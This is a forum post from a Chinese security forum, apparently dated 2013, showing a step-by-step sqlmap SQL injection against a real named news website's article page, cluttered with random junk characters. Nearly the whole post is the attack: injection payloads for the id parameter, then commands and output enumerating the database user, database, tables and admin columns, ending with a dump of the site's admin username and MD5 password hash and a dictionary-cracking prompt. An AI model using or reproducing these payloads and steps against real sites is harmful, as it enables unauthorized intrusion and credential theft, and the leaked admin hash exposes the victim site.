找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2429|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' ~) _0 X, C( Cms "Mysql" --current-user       /*  注解:获取当前用户名称! p( m% p# [8 \1 r4 A6 M) m
    sqlmap/0.9 - automatic SQL injection and database takeover tool, I& G0 x7 }: Y; s. n0 i& n
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    & c0 ^- |% b; |+ v; T7 s/ B5 K[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ }- T2 {' m. [* V# ^2 }
    session file2 o/ A0 G  c# \$ V1 @( S: f
    [16:53:54] [INFO] resuming injection data from session file. H! j' U2 h; z8 f% j: ^- P& a
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    + R( N# S5 y) h+ l$ B6 j: [3 K! @[16:53:54] [INFO] testing connection to the target url
    7 {$ G( S, E" `$ Ssqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 x' Z' {. P. |sts:
    8 Y8 v' y/ E& f% `& W---
    4 p2 P: x7 K" C1 s6 {Place: GET, j( K- y4 u% D0 Y
    Parameter: id$ u6 H' o3 j. j7 S
        Type: boolean-based blind9 d3 {+ y( L" ?4 ?8 z9 z
        Title: AND boolean-based blind - WHERE or HAVING clause
    3 u& J, `' H1 ~/ Z1 \    Payload: id=276 AND 799=799
    " ^# X( N1 i; w. _" I& r$ `- o- e) T    Type: error-based$ y) Q+ z" D# ?2 ~1 K
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    % Y5 f8 d( R: c- k9 y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - `  y2 K; {' k. A% j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 q7 h( }$ s: T) n3 C. {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! @2 F. F4 d% L$ b
        Type: UNION query7 _: P4 z+ i! Q4 L8 h
        Title: MySQL UNION query (NULL) - 1 to 10 columns% Z4 p- a# D- W1 a# A
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    9 G$ m6 ]- r- E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
      ~. d3 `5 |( d  [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) N. H/ f, N2 r& v
        Type: AND/OR time-based blind
    * H1 x+ P3 W. V6 ~/ r    Title: MySQL > 5.0.11 AND time-based blind9 d8 W8 r. `$ ~
        Payload: id=276 AND SLEEP(5)2 \  P- s+ K% ^& v# ~' W. s
    ---2 Y' T2 F2 ?- N* I
    [16:53:55] [INFO] the back-end DBMS is MySQL) t) [; {% q1 @9 f4 M9 Z
    web server operating system: Windows, c1 I6 G5 U- t2 n/ `
    web application technology: Apache 2.2.11, PHP 5.3.0& T9 Z1 Y+ l- E  I: z* l
    back-end DBMS: MySQL 5.0: T0 R: l- W1 O. D
    [16:53:55] [INFO] fetching current user
    ) }+ K! A. C  l, U$ b1 lcurrent user:    'root@localhost'   
    1 Z0 \7 W8 a- f& k[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# [+ w% l) ]! U- s' [2 f
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58) e# d/ R5 Y8 L% l
    , v* v# n/ _; j) w
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    * O0 X2 L6 F- }) \% }4 d& Jms "Mysql" --current-db                  /*当前数据库
    4 U7 N  w+ r- M" H$ J    sqlmap/0.9 - automatic SQL injection and database takeover tool6 a! h& Y. X+ z4 i; |7 o# u6 x, c# z
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    3 v) h9 H* r! J/ V& I$ \( R1 L# G[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# n" V5 Y' X0 \# v4 T6 A
    session file' g" f& O0 F' T$ ~( D' U$ C
    [16:54:16] [INFO] resuming injection data from session file- Q8 U/ e, z' g" S
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ |* f5 G0 X: I6 m* y* n' g
    [16:54:16] [INFO] testing connection to the target url
    * w# S- ^! U# @3 E; \+ S: O" jsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 q/ ]0 ~2 f8 F- h
    sts:0 ^0 n5 F) z) l- }
    ---
    . Z) P* ]5 ?# E! R8 ]Place: GET% C, ?" e: }% _1 U- i3 W. b7 t
    Parameter: id# ~" ^/ k! d  h" d% ?0 \- y
        Type: boolean-based blind
    3 J  O( a- T4 E' r    Title: AND boolean-based blind - WHERE or HAVING clause
    ( ^7 ~8 n& R% l: A, M5 Y    Payload: id=276 AND 799=799
    + p$ D' V  p; v. v: ], S    Type: error-based
    : @- d6 \# z6 S% \    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ y; H% H: g: A( J
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 J5 K7 Y0 _+ H" Q# ]% d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! G8 f2 G" O7 P$ o& N  n: e
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    # n9 Y' d% S. E% o# h" e    Type: UNION query# Q/ i; k' D! W. R4 o
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    6 d8 E3 p& _* D! J. N& I    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 r# y1 [: Y& Y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ r. }6 |5 S# i" s3 k# \
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    7 y" J' m7 U) U6 X0 r    Type: AND/OR time-based blind1 N5 s; L# y3 ]
        Title: MySQL > 5.0.11 AND time-based blind4 X$ P# z( c5 ^6 ]) j2 m" t7 p
        Payload: id=276 AND SLEEP(5)
    2 \% `% P6 x+ ^3 o. M---0 q, H& R, J: N
    [16:54:17] [INFO] the back-end DBMS is MySQL
    7 p4 p- W* @2 Qweb server operating system: Windows2 R1 }7 f+ t! a5 L* f" @
    web application technology: Apache 2.2.11, PHP 5.3.0% u. f' [3 |7 ]7 {
    back-end DBMS: MySQL 5.07 Y4 _* d- h: v" ?% a
    [16:54:17] [INFO] fetching current database
    * c6 `; Q/ X2 L0 u; n/ |( ]4 m# L( Ecurrent database:    'wepost'" d. H: f$ Y. G0 p  a% k- h
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# h$ Q' D& L7 N' I* U4 }# d
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:183 ?- ^" j7 v  e5 B
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- \0 L' s2 }) P& }8 j) j
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名: E9 w. }5 {, c3 n) D
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    6 |9 c2 B* }8 s+ ^1 `( s+ U    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    3 E( d' }1 L" z4 E$ B[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 i3 |: i& \: p  H1 H
    session file( A- t7 @$ u  @8 v" h; }: o* p
    [16:55:25] [INFO] resuming injection data from session file
    8 Y. `' l' B+ J0 c0 z, U[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ S; _# f6 |* N
    [16:55:25] [INFO] testing connection to the target url
      B" n* T: z: A! Isqlmap identified the following injection points with a total of 0 HTTP(s) reque9 x1 p4 x& b" N/ D/ @0 s' Z
    sts:: D$ I( F4 o/ [, z* r0 K5 c
    ---" x) {" w- x( o0 c  `$ f& z
    Place: GET
    4 I4 N/ Y& u9 i8 t, U" @5 x8 X+ sParameter: id; Q( q9 H( k( n. n9 }; g
        Type: boolean-based blind
    1 w" K+ B- o& A$ z6 ]    Title: AND boolean-based blind - WHERE or HAVING clause
    " C; O' j+ ?% p6 D    Payload: id=276 AND 799=799
    9 _1 }/ g$ I5 D1 }$ i    Type: error-based- n* n" l" ?& C; k- |" H
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    7 Z$ e* |  R- ]' x! {, c# j1 i5 T    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; x7 k; Y+ b/ {% h. [
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, K/ u2 {# M( z: v0 S. X9 a; Q
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . I: q. n# j6 }4 V    Type: UNION query- \* Q4 F( i+ p: {* R
        Title: MySQL UNION query (NULL) - 1 to 10 columns7 F( V" \3 H% q3 u8 H) {
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    & s6 H- G  I: `2 b: N9 X(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 V/ N3 j& w0 L8 D
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    9 K  L+ G7 Y! o& }2 G0 {    Type: AND/OR time-based blind9 Z* f# w+ |1 ^! {
        Title: MySQL > 5.0.11 AND time-based blind
    3 |: N9 a( D3 j' ?% i9 o    Payload: id=276 AND SLEEP(5)
    8 s3 z" m0 r8 @) h8 D9 |---
      j) v% i! M+ I" W0 i" ]' M( r  K2 ][16:55:26] [INFO] the back-end DBMS is MySQL9 M+ |0 Q- G! a
    web server operating system: Windows
    . t8 k# J* Z/ V, F  M" G: xweb application technology: Apache 2.2.11, PHP 5.3.0  m5 t3 c) q) z  c9 G2 i
    back-end DBMS: MySQL 5.0
    8 V- U8 k4 b2 E2 y[16:55:26] [INFO] fetching tables for database 'wepost'# d( i6 F$ ?* q) {
    [16:55:27] [INFO] the SQL query used returns 6 entries
    # A! M6 B0 Y4 ]7 A+ E5 ODatabase: wepost7 x1 w9 g, V0 Y# N+ L
    [6 tables]
    % d; _: x- f% C1 M  g0 P% M+-------------+! j  E9 z/ P6 ^+ o+ X+ F& T
    | admin       |% H' n% @; G& q# z* R
    | article     |# [5 V- N; l+ o6 X# `
    | contributor |; F) D& r1 ^1 Z4 F5 [9 [+ z
    | idea        |
    # a7 z; b3 Z6 ?  w# x$ r8 T: F| image       |+ _; e+ V! g1 u2 @4 s9 L
    | issue       |' Z  x1 e7 J# f" H( ?0 V5 `: N& C
    +-------------+
    6 w1 H# y0 v6 f$ ^! B[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou" \6 d) j0 D5 P1 d: D5 _7 ^/ d
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    ! I/ h' h( N6 Z0 b$ D7 D$ S$ f. w0 O& V, j* |5 N, c
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    + e" ~* E- G9 ]* g) E4 E# |7 P; T  Nms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    - h9 A- B, i0 S2 ^( W    sqlmap/0.9 - automatic SQL injection and database takeover tool3 Q; i5 u0 ~1 H  h2 r: y4 p
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    6 y  X" F  \" [$ F4 ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    $ u8 m: O* Q  L% Z5 Z( D6 a( Osts:  f: o( W. x4 S+ Q" g5 \- l4 a3 O$ Y
    ---: D5 o& u. b! s& e/ @6 a/ N
    Place: GET. h9 Z# C: m% @3 x  m1 u
    Parameter: id
    7 x# S3 ^6 v9 y$ l    Type: boolean-based blind
    9 Z# a9 `, [" n7 \9 F$ N    Title: AND boolean-based blind - WHERE or HAVING clause
    - L! q$ R. u4 F- w- P1 M& E    Payload: id=276 AND 799=799
    * w0 Y: |' c) n3 B+ `! [1 s9 D9 O    Type: error-based. G, K2 x2 a' j/ n& j" i' e( o
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. E+ y& k. {+ ?- \: x) m
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: v# G1 t( D. I# b/ [: _
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) z" W. S& s0 M. V7 K. F4 O
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ R# O0 Y, R( l$ I6 M
        Type: UNION query* |) ]) w+ D6 I, K1 g- E* |0 D1 r
        Title: MySQL UNION query (NULL) - 1 to 10 columns6 J$ O% i3 x$ X
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) D0 ], W" {! @
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * m5 F: y- V- \6 `; x6 W/ g, J" TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% j1 B0 S% I/ K5 @3 w
        Type: AND/OR time-based blind
    $ F4 p7 s) O& ?2 X# }7 Q    Title: MySQL > 5.0.11 AND time-based blind; F$ G5 O; i' ^( f' ~! a
        Payload: id=276 AND SLEEP(5)  Q$ ?9 X* N2 F
    ---
    / X5 |  t* S! |0 u2 }8 }1 Bweb server operating system: Windows
    ' c* Y7 W* O- X: d" b1 tweb application technology: Apache 2.2.11, PHP 5.3.0
    # J$ S5 _' b1 F& }" U3 x( [) dback-end DBMS: MySQL 5.0! w" K* X$ W' H  j; ^/ ~7 N% q
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    0 k5 [. K4 A7 |8 [3 x' Jssion': wepost, wepost$ m0 L, {# O+ I4 n. O
    Database: wepost
    . j; \- B0 V) ^3 j/ _/ ]! kTable: admin: r: N, ?2 F+ |. o; Z
    [4 columns]
    " g1 k- ?1 h/ A! R+----------+-------------+$ W# Q( |) f6 w) d" T7 ^8 C
    | Column   | Type        |
    3 x- j4 p  Q: ~( [1 M8 R- w7 c+ {+----------+-------------+9 u  V+ }! N1 S1 Y# B5 B
    | id       | int(11)     |
    4 O; @$ B/ ?! ^8 q+ U/ R# U# @| password | varchar(32) |
    ; B( t2 D# s6 R1 E3 X| type     | varchar(10) |6 f! t$ ?( r2 b% K1 O) C
    | userid   | varchar(20) |5 c3 w/ d3 }5 k9 R8 q9 u* s( f: G
    +----------+-------------+0 E2 T7 P( ]: n* P; ^" H1 ^
  • shutting down at: 16:56:192 z( N/ J9 R2 o% c3 n' c# K( q
    - f7 e0 ?; D3 w, p9 R  _! @1 H
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 w- A! [3 o* K# Y- o
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容/ m0 P) e$ f- F& M0 L
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    & m6 b/ S7 f( @, U0 p) z! ?    http://sqlmap.sourceforge.net
  • starting at: 16:57:146 r' V  n2 E& V
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque* E3 ~- O0 [% r* v( R
    sts:
    , ^6 C7 c( y5 W5 k$ m% g---$ C, M5 Z. D: G* ]2 z( I
    Place: GET
    2 ~, j+ U7 s1 o8 x# K- m! eParameter: id
    " ]! R2 N+ h8 H' n8 Q    Type: boolean-based blind
    : y6 o& a( D; v0 }% ?    Title: AND boolean-based blind - WHERE or HAVING clause, C" t1 K2 [3 {- A
        Payload: id=276 AND 799=799: u2 H  E" n' y: ^; E5 ?2 O
        Type: error-based& V( ^: {- Y$ B% l6 E
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" d0 ^% o3 E6 D
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
      G, o, J7 C4 x4 g' X2 a6 f120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    * |& v2 x; B* M) T; Q4 q! e$ I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 Q9 V) ]0 }; |. b9 ~2 N( d6 [! G! q8 f) M
        Type: UNION query
    # J/ R% j2 F% @; T# n, @    Title: MySQL UNION query (NULL) - 1 to 10 columns* W* p7 {6 D: Q
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    . l$ x# E. ?+ z1 g' p; H$ v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: f. J: B1 M* j% }5 z
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( ]. l4 ], K* x, Q; n! D
        Type: AND/OR time-based blind* [4 a6 R- E( X  O  \+ S
        Title: MySQL > 5.0.11 AND time-based blind
    & `6 L+ I# r. V+ M1 S    Payload: id=276 AND SLEEP(5)# f9 B3 K) s' |! F& R" `) m
    ---( W, C0 k8 r& q3 V& \; l
    web server operating system: Windows3 f+ U+ M4 A  q0 j" r
    web application technology: Apache 2.2.11, PHP 5.3.0
    . m/ k; J8 I9 Y/ M. n/ m' `1 Jback-end DBMS: MySQL 5.0
    - V5 L! ^0 N: D! Qrecognized possible password hash values. do you want to use dictionary attack o
    ( Z2 n) X$ d* qn retrieved table items? [Y/n/q] y
    . l# {) h: t$ e' g/ |$ hwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    ! e! }0 M: C* j  G$ ^7 bdo you want to use common password suffixes? (slow!) [y/N] y3 x3 n" n6 _8 G" x: d; a7 b
    Database: wepost
    0 U% m* ~) j: r1 D: a% i* }Table: admin
    * v6 r$ j- l- b& X/ ]6 w8 j9 L: Y[1 entry]
    " u! f% _9 A& b1 o+----------------------------------+------------+
    % L8 U& W1 a& D' [7 H8 l% || password                         | userid     |
    : q/ K6 t( D; z: \9 L, ~+----------------------------------+------------+
    4 f. Y$ T( l5 F  l) \| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- ?1 \) |# _6 G3 y
    +----------------------------------+------------+
    4 {  t3 W- |& g" L  f4 E/ c
  • shutting down at: 16:58:149 w& E* m6 z. n

    ! p; b6 ]/ ~' OD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表